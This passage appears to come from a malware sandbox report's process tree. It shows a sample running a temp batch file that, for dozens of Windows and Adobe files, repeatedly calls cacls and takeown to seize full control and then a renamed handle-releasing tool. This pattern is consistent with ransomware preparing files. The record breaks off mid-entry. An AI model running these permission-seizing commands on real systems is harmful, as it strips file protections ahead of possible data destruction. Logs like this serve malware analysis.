  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml""
  2⤵
  PID:1352
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml" /E /G Admin:F /C
    3⤵
    PID:3940
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml"
    3⤵
    PID:564
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftOffice2013Office365Win32.xml" -nobanner
    3⤵
    PID:2484
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftOffice2013Office365Win32.xml" -nobanner
      4⤵
      PID:2960
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:292
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml""
  2⤵
  PID:3348
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml" /E /G Admin:F /C
    3⤵
    PID:3336
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml"
    3⤵
    - Modifies file permissions
    PID:2420
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftOutlook2016CAWin32.xml" -nobanner
    3⤵
    PID:2428
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftOutlook2016CAWin32.xml" -nobanner
      4⤵
      PID:3940
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:564
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""
  2⤵
  PID:3012
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" /E /G Admin:F /C
    3⤵
    PID:1352
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd"
    3⤵
    PID:2648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner
    3⤵
    PID:844
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner
      4⤵
      PID:3336
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2420
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.275a3a31-e95e-4e65-a31a-3845cfc05d38.1.etl""
  2⤵
  PID:2424
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.275a3a31-e95e-4e65-a31a-3845cfc05d38.1.etl" /E /G Admin:F /C
    3⤵
    PID:3348
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.275a3a31-e95e-4e65-a31a-3845cfc05d38.1.etl"
    3⤵
    PID:3800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MoUsoCoreWorker.275a3a31-e95e-4e65-a31a-3845cfc05d38.1.etl" -nobanner
    3⤵
    PID:2484
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MoUsoCoreWorker.275a3a31-e95e-4e65-a31a-3845cfc05d38.1.etl" -nobanner
      4⤵
      PID:1352
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2648
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\USOShared\Logs\System\WuProvider.9cbc80f2-3967-41ff-842c-1a3366c13c32.1.etl""
  2⤵
  PID:1680
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\WuProvider.9cbc80f2-3967-41ff-842c-1a3366c13c32.1.etl" /E /G Admin:F /C
    3⤵
    PID:3056
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\WuProvider.9cbc80f2-3967-41ff-842c-1a3366c13c32.1.etl"
    3⤵
    PID:1104
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "WuProvider.9cbc80f2-3967-41ff-842c-1a3366c13c32.1.etl" -nobanner
    3⤵
    PID:2428
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "WuProvider.9cbc80f2-3967-41ff-842c-1a3366c13c32.1.etl" -nobanner
      4⤵
      PID:3348
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3800
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""
  2⤵
  PID:3828
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C
    3⤵
    PID:2088
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"
    3⤵
    - Modifies file permissions
    PID:2648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "behavior.xml" -nobanner
    3⤵
    PID:272
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "behavior.xml" -nobanner
      4⤵
      PID:3012
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1196
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""
  2⤵
  PID:3352
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C
    3⤵
    PID:780
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"
    3⤵
    PID:3468
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1412
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:564
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3588
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml""
  2⤵
  PID:3968
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml" /E /G Admin:F /C
    3⤵
    PID:3228
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml"
    3⤵
    - Modifies file permissions
    PID:3836
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftLync2010.xml" -nobanner
    3⤵
    PID:1192
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftLync2010.xml" -nobanner
      4⤵
      PID:2844
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1752
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml""
  2⤵
  PID:3348
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml" /E /G Admin:F /C
    3⤵
    PID:2864
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml"
    3⤵
    PID:1412
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftOffice2013Win32.xml" -nobanner
    3⤵
    PID:3884
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftOffice2013Win32.xml" -nobanner
      4⤵
      PID:2020
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1016
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml""
  2⤵
  PID:3496
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml" /E /G Admin:F /C
    3⤵
    PID:2808
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml"
    3⤵
    PID:2844
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftSkypeForBusiness2016Win32.xml" -nobanner
    3⤵
    PID:1752
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftSkypeForBusiness2016Win32.xml" -nobanner
      4⤵
      PID:3960
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1388
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd""
  2⤵
  PID:780
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd" /E /G Admin:F /C
    3⤵
    PID:1596
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd"
    3⤵
    PID:3884
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner
    3⤵
    PID:2956
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner
      4⤵
      PID:2424
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3468
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.bd986a82-15ec-44c3-ba13-593bc1047de7.1.etl""
  2⤵
  PID:3228
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.bd986a82-15ec-44c3-ba13-593bc1047de7.1.etl" /E /G Admin:F /C
    3⤵
    PID:364
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.bd986a82-15ec-44c3-ba13-593bc1047de7.1.etl"
    3⤵
    - Modifies file permissions
    PID:3960
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MoUsoCoreWorker.bd986a82-15ec-44c3-ba13-593bc1047de7.1.etl" -nobanner
    3⤵
    PID:1388
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MoUsoCoreWorker.bd986a82-15ec-44c3-ba13-593bc1047de7.1.etl" -nobanner
      4⤵
      PID:1256
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3836
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.b0c355e6-65a5-4b2e-b901-5341ebba0138.1.etl""
  2⤵
  PID:3312
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.b0c355e6-65a5-4b2e-b901-5341ebba0138.1.etl" /E /G Admin:F /C
    3⤵
    PID:2484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.b0c355e6-65a5-4b2e-b901-5341ebba0138.1.etl"
    3⤵
    PID:2424
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "WuProvider.b0c355e6-65a5-4b2e-b901-5341ebba0138.1.etl" -nobanner
    3⤵
    PID:3888
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "WuProvider.b0c355e6-65a5-4b2e-b901-5341ebba0138.1.etl" -nobanner
      4⤵
      PID:3344
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3336
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRdrDCUpd1901020069.msp""
  2⤵
  PID:3232
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRdrDCUpd1901020069.msp" /E /G Admin:F /C
    3⤵
    PID:3828
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRdrDCUpd1901020069.msp"
    3⤵
    PID:1256
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "AcroRdrDCUpd1901020069.msp" -nobanner
    3⤵
    PID:3452
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "AcroRdrDCUpd1901020069.msp" -nobanner
      4⤵
      PID:3012
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1196
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""
  2⤵
  PID:1140
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C
    3⤵
    PID:780
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"
    3⤵
    PID:3352
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "background.png" -nobanner
    3⤵
    PID:2420
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "background.png" -nobanner
      4⤵
      PID:3588
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3884
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml""
  2⤵
  PID:3056
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" /E /G Admin:F /C
    3⤵
    PID:3432
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml"
    3⤵
    PID:2808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "tasks.xml" -nobanner
    3⤵
    PID:1596
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "tasks.xml" -nobanner
      4⤵
      PID:3496
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3232
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml""
  2⤵
  PID:1752
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml" /E /G Admin:F /C
    3⤵
    PID:2984
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml"
    3⤵
    - Modifies file permissions
    PID:2916
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftInternetExplorer2013Backup.xml" -nobanner
    3⤵
    PID:364
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftInternetExplorer2013Backup.xml" -nobanner
      4⤵
      PID:2648
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:292
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml""
  2⤵
  PID:3996
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml" /E /G Admin:F /C
    3⤵
    PID:2960
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml"
    3⤵
    PID:3836
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftOffice2013Office365Win64.xml" -nobanner
    3⤵
    PID:3960
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftOffice2013Office365Win64.xml" -nobanner
      4⤵
      PID:564
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3056
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml""
  2⤵
  PID:2252
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml" /E /G Admin:F /C
    3⤵
    PID:1016
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml"
    3⤵
    PID:64
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftOutlook2016CAWin64.xml" -nobanner
    3⤵
    PID:1680
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftOutlook2016CAWin64.xml" -nobanner
      4⤵
      PID:2864
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:780
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd""
  2⤵
  PID:2428
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd" /E /G Admin:F /C
    3⤵
    PID:3836
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd"
    3⤵
    PID:1256
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner
    3⤵
    PID:564
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner
      4⤵
      PID:1192
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3012
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""
  2⤵
  PID:3420
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C
    3⤵
    PID:3380
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"
    3⤵
    PID:3352
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "watermark.png" -nobanner
    3⤵
    PID:2088
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "watermark.png" -nobanner
      4⤵
      PID:2928
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3344
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""
  2⤵
  PID:1352
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C
    3⤵
    PID:2956
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"
    3⤵
    - Modifies file permissions
    PID:1104
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:3968
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1596
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3432
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml""
  2⤵
  PID:2344
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml" /E /G Admin:F /C
    3⤵
    PID:3800
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml"
    3⤵
    PID:1412
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftLync2013Win32.xml" -nobanner
    3⤵
    PID:2252
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftLync2013Win32.xml" -nobanner
      4⤵
      PID:2020
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2844
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml""
  2⤵
  PID:3472
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml" /E /G Admin:F /C
    3⤵
    PID:3496
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml"
    3⤵
    PID:3452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftOffice2013Win64.xml" -nobanner
    3⤵
    PID:2428
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftOffice2013Win64.xml" -nobanner
      4⤵
      PID:1256
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2992
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml""
  2⤵
  PID:1592
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml" /E /G Admin:F /C
    3⤵
    PID:64
